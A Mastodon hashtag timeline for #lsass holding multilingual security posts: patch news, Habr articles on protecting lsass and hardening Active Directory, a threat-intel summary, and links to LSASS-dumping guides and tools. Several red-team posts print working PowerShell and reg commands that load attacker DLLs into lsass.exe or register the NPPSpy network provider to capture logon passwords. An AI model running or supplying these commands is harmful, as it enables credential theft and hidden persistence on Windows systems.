#lsass

PressMind Labspressmind
2026-01-14

Microsoft stycznia 2026 – Krytyczne łatki, zero-day i pilne aktualizacje

Czy CVSS 5. 5 może być pilniejsze niż „krytyk”?

Czytaj dalej:
pressmind.org/microsoft-styczn

Ilustracja przedstawiająca cyfrowy krajobraz związany z bezpieczeństwem komputerowym.
2025-09-21

Сдвиг парадигмы в безопасности серверов: как мы пережили Windows Server 2025 и сделали инфраструктуру крепче

Мы поймали странный «обрыв» доступа к нескольким NAS и старому принтер-серверу. В логе — ничего драматического: «не получилось договориться по безопасности». Виноват оказался не «прокси/файрвол», а новая норма безопасности : клиент Windows Server 2025 уже требует подпись SMB-пакетов . Всё, что не умеет — идёт мимо кассы. В тот же месяц у коллег «ложилась» интеграция, ретранслирующая NTLM на LDAP, — и снова не сеть виновата. LDAP-подпись и привязка канала (channel binding) перестали считать ретрансляцию чем-то приемлемым. Зато после шторма заметно стихло количество «подозрительных» попыток бокового смещения. Мораль простая: реактивная модель «ставим патчи и надеемся» больше не тянет . Нужен проактивный дизайн — с нормами безопасности, которые не нужно «включать по желанию», а которые уже встроены в дефолт .

habr.com/ru/articles/948976/

#windows_server_2025 #active_directory #SMB_signing #LDAP_signing #kerberos #ntlm #AD_CS #laps #credential_guard #lsass

kriware :verified:kriware@infosec.exchange
2025-09-20

Different ways to dump LSASS

Guide to dumping lsass: Task Manager, comsvcs MiniDump, procdump, MiniDumpWriteDump, handle steal, PssCaptureSnapshot, SilentProcessExit.

github.com/yo-yo-yo-jbo/dumpin

#LSASS

2025-09-04

Защита процесса lsass от credential dumping

Процесс lsass.exe (Local Security Authority Subsystem Service) — критически важный компонент ОС Windows. Он отвечает за аутентификацию пользователей и управление учетными данными. В его памяти хранятся хэши паролей NTLM, билеты Kerberos, данные сессий, а в некоторых конфигурациях — даже пароли в открытом виде, если используется устаревший протокол WDigest. Столь высокая концентрация секретов делает lsass.exe лакомой целью для злоумышленников, получивших доступ к системе. После Initial Access фазы атакующий будет стремиться повысить привилегии и двигаться дальше по сети. Дамп памяти lsass.exe — самый прямой и часто самый простой способ достичь этих целей, поскольку при отсутствии защиты атакующий очень легко извлекает оттуда данные для проведения атак Pass-the-hash и Pass-the-ticket. В то же время, для атаки на незащищенный lsass.exe, нужно сравнительно немного: права локального администратора и Mimikatz. Таким образом, защиту этого процесса, по моему мнению, нужно внести в базовый набор мероприятий для любой инфраструктуры с Windows-машинами. Существуют различные методы получения дампа lsass.exe. В материале мы рассмотрим как тривиальные, так и более изощренные, но не с позиции атакующего. Поскольку основная часть материала будет посвящена методам защиты lsass от извлечения данных, знакомство с различными способами атаки будет играть вспомогательную роль для лучшего понимания механики защитных мер.

habr.com/ru/companies/first/ar

#lsass #mimikatz #credentials

Who Let The Dogs Out 🐾ashed@mastodon.ml
2025-08-16

#red_team #lsass #hacking

Существуют также специфичные ключи реестра.

Первый — `LSASS Driver`. Это недокументированное значение реестра, в которое можно засунуть библиотеку и она будет загружена в процесс `lsass.exe`.

```ps1
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\windows\system32\1.dll"
```

- github.com/oxfemale/LogonCrede .

Также `LsaExtensionConfig`:

```reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LsaExtensionConfig\Interfaces\1002
```

- github.com/Maldev-Academy/Lsas

Наконец, существует возможность злоупотребления службой `KeyISO` для подгрузки библиотеки в процесс lsass.exe, этот метод описывал itm4n в статье (itm4n.github.io/ghost-in-the-p).

Who Let The Dogs Out 🐾ashed@mastodon.ml
2025-08-16

#red_team #lsass #hacking

Диспетчер УД

```ps1
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll"
```

Подробнее:
- xakep.ru/2023/03/15/windows-pa;
- habr.com/ru/articles/709128/ - проект по отслеживанию изменения пароля пользователей.

Who Let The Dogs Out 🐾ashed@mastodon.ml
2025-08-16

#red_team #lsass #hacking

- github.com/mdsecactivebreach/D - загрузка через RPC + python-обвязка для использования с Kali Linux.

Помимо `Security Packages`, вы можете грузить `Authentication Packages`, `Notification Packages` и компоненты диспетчера учётных данных. Последний способ уже не работает на современных системах. Также не существует отдельного API-вызова , требуется править реестр и перезагружать систему.

Затронуты следующие ключи реестра:

`Authentication Packages`

```cmd
reg add hklm\system\currentcontrolset\control\lsa\ /v "Authentication Packages" /d "msv1_0"\0"fulllegit" /t REG_MULTI_SZ
```

`Notification Packages`

```cmd
reg add "hklm\system\currentcontrolset\control\lsa" /v "notification packages" /d scecli\0evilpwfilter /t reg_multi_sz
```

Who Let The Dogs Out 🐾ashed@mastodon.ml
2025-08-16

Как внедряться в lsass.exe

#red_team #lsass #hacking

Стандартные методы внедрения DLL: `SideLoading`, `Search Order Hijacking` и т.п.

Рассмотрим методы внедрения DLL характерные для `lsass.exe`.

`Custom SSP`. Техника позволяет загрузить собственный `Security Package` в адресное пространство процесса `lsass.exe`. Плюс - в возможности загрузки библиотеки без перезагрузки целевого устройства через вызов `AddSecurityPackage()` (learn.microsoft.com/en-us/wind).

Код и подробный разбор:
- blog.xpnsec.com/exploring-mimi - анализ `Security Packages`;
- xakep.ru/2023/03/15/windows-pa - подробный разбор механизма аутентификации в Windows;
- snovvcra.sh/2024/05/19/from-dl - кейс с загрузкой вредоносного `SSP`;
- github.com/jas502n/mimikat_ssp - загрузка через метод `SspirCallRpc()`;

2024-10-08

Etwas Hacking für Zwischendurch: Ein LSASS Dump unterhalb des Radars typischer Snakeoil AV und EDRs erstellen.

codeberg.org/tomas-jakobs/lsas

#Freebasic #LSASS #Hacking #Codeberg

Screenshot Codeberg Repo des lsass-dump Tools
2024-08-09

Windows Downdate – atak na w pełni „zaktualizowany” system eksploitami sprzed lat

Ukazał się raport opisujący nową technikę ataku na systemy Windows zwaną „Windows Downdate”: Aktualizacje są jednym z kluczowych procesów pozwalających na zapewnienie bezpieczeństwa wykorzystywanych systemów. Kolejne poprawki mają na celu między innymi usunięcie podatności wykrytych od czasu wydania poprzedniej aktualizacji. Chociaż systemy operacyjne wciąż mają wiele do nadrobienia, to ich...

#Aktualności #WBiegu #Blackhat #Exploit #Lsass #Patch #Update #Upgrade #Windows

sekurak.pl/windows-downdate-at

2024-04-10

Охота за кредами

Существуют различные способы аутентификации в системах Windows, каждый из этих способов сохраняет или кэширует переданные учетные данные. В этом модуле мы рассмотрим основные типы аутентификации и места кэширования переданных данных, а также разберем, как можно получить к ним доступ.

habr.com/ru/articles/806831/

#CredentialAccess #SAM #LSA #lsass #NTDSDIT #mimikatz #windows #active_directory #redteam #pentest

2024-03-24

Microsoft has quickly released emergency updates to fix a critical memory leak vulnerability in some Windows Server domain controllers. This issue affects the Local Security Authority Subsystem Service (LSASS) when handling Kerberos authentication requests, potentially leading to domain controller failure over time. The updates are cumulative and replace any previous updates for the affected operating systems. They are available for Windows Server 2022, 2016, and 2012 R2, with an update for Windows Server 2019 expected soon. Microsoft urges IT administrators to apply these out-of-band updates as soon as possible, especially if the March 2024 monthly rollup hasn't been installed yet.

learn.microsoft.com/en-us/wind

#cybersecurity #microsoft #windowsserver #lsass #kerberos #vulnerability

Just Another Blue TeamerLeeArchinal@ioc.exchange
2023-09-02

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

Attack Chain (From source)
acrypthash👨🏻‍💻acrypthash@infosec.exchange
2023-03-27

"Injecting pc.dll into LSASS as a Security Package. Security Packages are used to extend the Windows authentication mechanism and can be abused to execute malicious code in the context of LSASS" - I was today years old when I learned this!

sentinelone.com/labs/operation

#security #S1 #LSASS #defenseevasion #apt

2023-03-02

TIL about #LSASS and #vdigest basically storing passwords in plain text and I'm crying.

2023-02-28

“New PostDump version include C# / .NET implementation of the famous NanoDump's NanoDumpWriteDump function, which permit to dump most important #Lsass modules only” #redteam #offensivesecurity #cybersecurity #infosec
github.com/post-cyberlabs/Offe

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst